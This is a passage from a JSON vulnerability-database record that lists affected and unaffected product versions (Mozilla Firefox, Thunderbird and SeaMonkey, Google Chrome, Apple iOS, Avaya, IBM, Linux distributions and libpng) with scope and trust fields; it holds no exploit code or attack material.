"model": "seamonkey",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.4"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.216"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.6.24"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.5.1"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.0.1"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "6.0.2"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.344"
},
{
"model": "aura system manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.1.1"
},
{
"model": "aura application server sip core pb23",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "53002.0"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "10.0"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "8.0.1"
},
{
"model": "ios",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "5.1.1"
},
{
"model": "seamonkey",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.5"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.1"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.215"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.200"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "7.0.1"
},
{
"model": "thunderbird",
"scope": "ne",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.1.19"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.6.19"
},
{
"model": "enterprise linux desktop",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "6"
},
{
"model": "seamonkey beta",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.02"
},
{
"model": "ios",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "3.2"
},
{
"model": "proactive contact",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "4.2.2"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.202"
},
{
"model": "seamonkey alpha2",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.1"
},
{
"model": "lotus notes fp5",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5.1"
},
{
"model": "iron",
"scope": "ne",
"trust": 0.3,
"vendor": "srware",
"version": "18.0.1050.0"
},
{
"model": "firefox beta4",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "4.0"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.696.57"
},
{
"model": "conferencing standard edition",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.0"
},
{
"model": "message networking",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2.3"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.3"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.6.18"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.303"
},
{
"model": "linux ia-64",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "6.0"
},
{
"model": "tv",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "5.0"
},
{
"model": "voice portal sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.0"
},
{
"model": "voice portal",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.1"
},
{
"model": "ios",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "4.2"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.5.18"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.1.6"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.1.4"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.6.23"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.211"
},
{
"model": "voice portal sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.0"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.0.11"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.18"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.8"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.19"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.104"
},
{
"model": "enterprise linux desktop version",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "4"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "8.0"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.12"
},
{
"model": "linux mandrake x86 64",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "2011"
},
{
"model": "enterprise linux workstation",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "6"
},
{
"model": "linux i386",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "10.10"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.5.8"
},
{
"model": "seamonkey",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.13"
},
{
"model": "seamonkey",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.2"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.5.10"
},
{
"model": "enterprise linux desktop client",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "5"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.0.17"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.6.26"
},
{
"model": "iron",
"scope": "eq",
"trust": 0.3,
"vendor": "srware",
"version": "11.0.700.1"
},
{
"model": "ios",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "4.1"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "9.0.1"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.0.6"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.0.1"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.024"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.7.4"
},
{
"model": "aura session manager sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.1"
},
{
"model": "aura communication manager utility services sp",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.16.1.0.9.8"
},
{
"model": "productions pale moon",
"scope": "eq",
"trust": 0.3,
"vendor": "moonchild",
"version": "3.6.29"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "10.0"
},
{
"model": "iq",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.17"
},
{
"model": "aura session manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.0.1"
},
{
"model": "opensuse",
"scope": "eq",
"trust": 0.3,
"vendor": "s u s e",
"version": "11.4"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.0.13"
},
{
"model": "aura presence services",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.1"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.0.11"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.215"
},
{
"model": "ios",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "3.0"
},
{
"model": "seamonkey",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.14"
},
{
"model": "linux lts sparc",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "8.04"
},
{
"model": "seamonkey",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.9"
},
{
"model": "storwize unified",
"scope": "ne",
"trust": 0.3,
"vendor": "ibm",
"version": "v70001.3.23"
},
{
"model": "lotus notes",
"scope": "ne",
"trust": 0.3,
"vendor": "ibm",
"version": "9.0"
},
{
"model": "aura system manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.1.5"
},
{
"model": "firefox beta",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.0.7"
},
{
"model": "linux lts i386",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "8.04"
},
{
"model": "tv",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "4.4"
},
{
"model": "ios",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "3.1"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.20"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.302"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.310"
},
{
"model": "messaging storage server sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2"
},
{
"model": "messaging storage server sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.1"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.5.4"
},
{
"model": "ios",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "4.3.5"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.91275"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.0.5"
},
{
"model": "seamonkey",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.12"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.0.9"
},
{
"model": "lotus notes",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5.1"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.5.14"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.27"
},
{
"model": "seamonkey",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.7"
},
{
"model": "mac os",
"scope": "ne",
"trust": 0.3,
"vendor": "apple",
"version": "x10.7.5"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.1.9"
},
{
"model": "conferencing standard edition",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.0.1"
},
{
"model": "seamonkey",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.2"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.13"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.1.8"
},
{
"model": "linux enterprise software development kit sp1 for sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "11"
},
{
"model": "voice portal sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.1"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.0.11"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.0.15"
},
{
"model": "linux amd64",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "6.0"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.19"
},
{
"model": "enterprise linux",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.5.15"
},
{
"model": "iron",
"scope": "eq",
"trust": 0.3,
"vendor": "srware",
"version": "11.0.700.2"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.6.4"
},
{
"model": "firefox rc2",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.107"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.0.18"
},
{
"model": "voice portal sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.1"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14"
},
{
"model": "linux arm",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "10.04"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.0.3"
},
{
"model": "linux powerpc",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "11.04"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.202"
},
{
"model": "seamonkey",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.4"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.0.6"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.5.16"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.6.6"
},
{
"model": "linux mips",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "6.0"
},
{
"model": "storwize unified",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "v70001.3.20"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.6.25"
},
{
"model": "message networking sp4",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.0.11"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.696.68"
},
{
"model": "message networking sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2"
},
{
"model": "linux enterprise server for vmware sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "11"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.1"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.549.0"
},
{
"model": "seamonkey rc2",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0"
},
{
"model": "iron",
"scope": "eq",
"trust": 0.3,
"vendor": "srware",
"version": "11.0.700.0"
},
{
"model": "enterprise linux ws",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "4"
},
{
"model": "firefox beta1",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "4.0"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.6.13"
},
{
"model": "firefox beta",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.63"
},
{
"model": "communication server 1000e signaling server",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "7.6"
},
{
"model": "seamonkey",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.3"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.207"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.0.5"
},
{
"model": "aura system manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.1"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.5"
},
{
"model": "proactive contact",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "4.0"
},
{
"model": "productions pale moon",
"scope": "ne",
"trust": 0.3,
"vendor": "moonchild",
"version": "9.2"
},
{
"model": "aura system manager sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.1"
},
{
"model": "ios",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "5.0.1"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.6.22"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.0.9"
},
{
"model": "messaging storage server sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2"
},
{
"model": "thunderbird",
"scope": "ne",
"trust": 0.3,
"vendor": "mozilla",
"version": "10.0.2"
},
{
"model": "enterprise server x86 64",
"scope": "eq",
"trust": 0.3,
"vendor": "mandrakesoft",
"version": "5"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.186"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.6.3"
},
{
"model": "aura session manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.1.3"
},
{
"model": "aura session manager sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2"
},
{
"model": "informix genero",
"scope": "ne",
"trust": 0.3,
"vendor": "ibm",
"version": "2.41"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.1.18"
},
{
"model": "iron",
"scope": "eq",
"trust": 0.3,
"vendor": "srware",
"version": "13.0.800.0"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.912.63"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.5.5"
},
{
"model": "aura session manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.2.3"
},
{
"model": "message networking sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2"
},
{
"model": "communication server 1000m",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "7.6"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.26"
},
{
"model": "message networking",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2"
},
{
"model": "linux mandrake",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "2010.1"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.0.2"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "6.0"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.597.94"
},
{
"model": "proactive contact",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "4.2"
},
{
"model": "aura system platform",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "1.0"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.6.17"
},
{
"model": "storwize unified",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "v70001.3.0.0"
},
{
"model": "enterprise linux hpc node optional",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "6"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.223"
},
{
"model": "ios",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "4"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.6.10"
},
{
"model": "firefox",
"scope": "ne",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.6.27"
},
{
"model": "ios",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "4.3"
},
{
"model": "seamonkey",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.6"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.0.3"
},
{
"model": "voice portal sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.1"
},
{
"model": "communication server 1000m signaling server",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "7.6"
},
{
"model": "aura system platform",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.0.3.8.3"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.0"
},
{
"model": "aura session manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "1.1.1"
},
{
"model": "enterprise linux",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5"
},
{
"model": "iq",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.1.1"
},
{
"model": "communication server 1000e",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "7.6"
},
{
"model": "thunderbird esr",
"scope": "ne",
"trust": 0.3,
"vendor": "mozilla",
"version": "10.0.2"
},
{
"model": "tv",
"scope": "ne",
"trust": 0.3,
"vendor": "apple",
"version": "5.1"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.0.14"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.1.1"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "4.0"
},
{
"model": "enterprise server",
"scope": "eq",
"trust": 0.3,
"vendor": "mandrakesoft",
"version": "5"
},
{
"model": "aura system platform",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.0.3.9.3"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13"
},
{
"model": "proactive contact",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "4.1"
},
{
"model": "iq",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "4.0"
},
{
"model": "lotus notes",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5.2"
},
{
"model": "aura application server sip core pb19",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "53002.0"
},
{
"model": "aura communication manager utility services",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.1"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.648.204"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.551.0"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.648.128"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.19"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.1.3"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.301"
},
{
"model": "cognos business intelligence",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "10.1.1"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.0"
},
{
"model": "communication server 1000m",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.0"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.7.3"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.14"
},
{
"model": "lotus notes",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5.3"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.5"
},
{
"model": "ios",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "2.1"
},
{
"model": "seamonkey",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.7"
},
{
"model": "linux amd64",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "11.04"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.222"
},
{
"model": "enterprise linux workstation optional",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "6"
},
{
"model": "aura session manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.2"
},
{
"model": "message networking",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2.2"
},
{
"model": "iq",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "4.2"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.696.65"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.5.6"
},
{
"model": "seamonkey 2.1b2",
"scope": null,
"trust": 0.3,
"vendor": "mozilla",
"version": null
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.5.9"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.15"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.4.3"
},
{
"model": "storwize unified",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "v70001.3.1.0"
},
{
"model": "communication server 1000m signaling server",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.0"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.7.1"
},
{
"model": "linux amd64",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "10.10"
},
{
"model": "communication server 1000e",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.0"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.0.23"
},
{
"model": "linux i386",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "11.04"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.0.2"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "6.0"
},
{
"model": "message networking",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2.1"
},
{
"model": "iron",
"scope": "eq",
"trust": 0.3,
"vendor": "srware",
"version": "13.0"
},
{
"model": "seamonkey beta",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.01"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.742.112"
},
{
"model": "firefox beta",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.05"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "7.0"
},
{
"model": "aura session manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.1.1"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "6"
},
{
"model": "linux enterprise server sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "11"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.1.7"
},
{
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.100"
},
{
"model": "iq",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "4.1"
},
{
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.1.5"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.45"
},
{
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.0"
},
{
"model": "linux arm",
"scope": "eq",
"trust": 0.3,
